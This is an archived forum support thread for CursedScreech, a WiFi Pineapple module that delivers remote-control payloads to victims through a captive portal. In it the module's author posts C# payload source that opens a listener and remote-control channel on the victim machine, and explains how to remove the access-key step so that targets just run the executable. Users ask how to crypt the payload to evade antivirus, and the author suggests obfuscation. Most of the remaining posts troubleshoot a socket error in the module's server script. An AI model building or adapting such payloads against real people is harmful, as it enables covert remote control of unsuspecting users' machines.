Jump to content

[Official] CursedScreech


sud0nick

Recommended Posts

On 7/11/2018 at 6:11 PM, Ramez said:

I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the follow directory: /pineapple/modules/CursedScreech/includes/forest

It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

Link to comment
Share on other sites

  • Replies 100
  • Created
  • Last Reply
1 hour ago, sud0nick said:

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programatically instead.

Link to comment
Share on other sites

1 hour ago, Sebkinne said:

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programatically instead.

Yeah, it's my fault for not checking for their existence in the first place.

Link to comment
Share on other sites

I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.

Link to comment
Share on other sites

@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class.  Here's an example:

using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
	public partial class Form1 : Form {
    
      	// ***************** REMOVE THIS LINE *****************
		PA_Authorization pauth = new PA_Authorization();
      	// ***************** REMOVE THIS LINE *****************
	
		public Form1() {
			InitializeComponent();
	
			CursedScreech cs = new CursedScreech();
			cs.startMulticaster("231.253.78.29", 19578);
			cs.setRemoteCertificateSerial("EF-BE-AD-DE");
			cs.setRemoteCertificateHash("1234567890ABCDEF");
			cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
		}
		private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
			e.Cancel = true;
			this.Hide();
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
      
		private void accessKeyButton_Click(object sender, EventArgs e) {
				
			// Request an access key from the Pineapple
			string key = pauth.getAccessKey();
	
			// Check if a key was returned
			string msg;
			if (key.Length > 0) {
				msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
			}
			else {
				msg = "Failed to retrieve an access key from the server.  Please try again later.";
			}
			
			// Display message to the user
			MessageBox.Show(msg);
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
	}
}

The authorization function is just a trick anyway.  There's no real dependency on the access key for Cursed Screech.  However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal.  Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.

Link to comment
Share on other sites

  • 2 weeks later...

first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why??

Link to comment
Share on other sites

11 hours ago, display-names said:

first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why??

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Link to comment
Share on other sites

11 hours ago, sud0nick said:

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

Link to comment
Share on other sites

16 hours ago, display-names said:

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Link to comment
Share on other sites

7 hours ago, sud0nick said:

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, i only have the option to set it to br-lan, i do have the most up to date version though. i will just try to reinstall the module i guess. but just in case, any idea's why i cant set my Sein interface to anything except br-lan?

 

EDIT 1: reinstall didnt help, too bad

Sein.png

Link to comment
Share on other sites

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

Link to comment
Share on other sites

On 8/9/2018 at 2:58 AM, sud0nick said:

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

hey there, i have tried to get it to work, but no luck, did you have any more luck?:)

Link to comment
Share on other sites

  • 6 months later...
On 8/10/2018 at 3:41 PM, display-names said:

hey there, i have tried to get it to work, but no luck, did you have any more luck?:)

Hi there,

I had the same problem. 

i studied the code (PinappleModules.cs) and found out that in "startMulticaster" in the while loop it set the "localIP" as wrong interface. so i had to disable the interface accordingly in the adapter settings - after all it chose the right interface. 

Link to comment
Share on other sites

  • 2 months later...
On 5/6/2019 at 11:35 AM, fan said:

I'm looking for a way to crypt the payload that I build with visual studio to avoid detection
help me thanks

You want to encrypt the payload for transmission only or while it's on disk too?  If you encrypt it on disk to bypass AV you won't be able to execute it.  To run it you would need to decrypt it and at that point AV would get you anyway.  The point in providing an API for this module is to allow you to create your own payloads and work around AV however you choose.  You could possibly obfuscate your code but I don't think encryption is what you want.

Link to comment
Share on other sites

Thanks for the answer, how can I use your payload to create another to bypass av. There is a video tutorial to learn how to do this.
Any information on this subject would be appreciated
 
Link to comment
Share on other sites

  • 5 months later...

Already messaged Nick, but figured I would post a reply to this topic to see if anyone else might have some insight.

I have downloaded the module on a freshly fac-resetted pineapple that has had the firmware upgrade. I ran opkg update and got the depends installed.
Tried to get everything running after using papers to generate certs and created a C# payload, but Sein will not start. I checked the backend and it was yelling at me about ssl module for python, got pip, installed ssl, and still nothing.

Pretty confused at this point.

Link to comment
Share on other sites

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

Link to comment
Share on other sites

  • 2 weeks later...

Hi there,

When I try to start kuro, the following entries appear in the Acitivity log:
[+] Starting Kuro...
[>] Cleaning up sockets

Then it ends kuro and I cannot send any commands. in PortalAuth under payload the target is visible. 
I'm afraid I don't know how to fix this at the moment. Can anyone help?

Thank you.

 

Link to comment
Share on other sites

  • 1 month later...
  • 5 months later...
On 10/18/2019 at 11:00 PM, cr4nk said:

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

Exact same problem that I've gotten! Is there any solution for this?

Link to comment
Share on other sites

  • 1 month later...

Hey everyone, I've decided that I'm not going to maintain this module any longer.  My reasons are similar to those I posted in the PortalAuth thread but also because the techniques used in this old module are no longer effective.  The payloads are caught pretty easily by AV now, even Windows Defender!  I think it's time for this module to ride off into the sunset.

As for the current issues poeple are facing with sein.py:

socket.error: illegal IP address string passed to inet_aton

This is probably because you haven't updated the interface setting from the module yet.  You should select an interface and click the save button which will update the settings.  You can also check /pineapple/modules/CursedScreech/includes/forest/settings to verify the correct IP address is set.  You may have my Pineapple's local IP in there (192.168.0.138) which is throwing the exception.

Link to comment
Share on other sites

8 hours ago, JediMasterX said:

my Pineapple is just dead meat, seems like its dead for a while now... seems like the product and most importently the cummunity is no longer there... wake up HAK5 😓

 

JMX

"Dead meat" is not a very diagnostic description.  What have you done to it? How did you attempt a reset?  Don't tell people to wake up if you can't really articulate what is going on.  Look at the reset process.  Follow it.  Make sure it is powered properly according to the documentation. Start following the process exactly.  Attempt to access it (and explain what happened), then if that doesn't work, follow the reset process.  Never expect people to care what you write when you didn't write anything descriptive yourself. That is important to any community.  

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...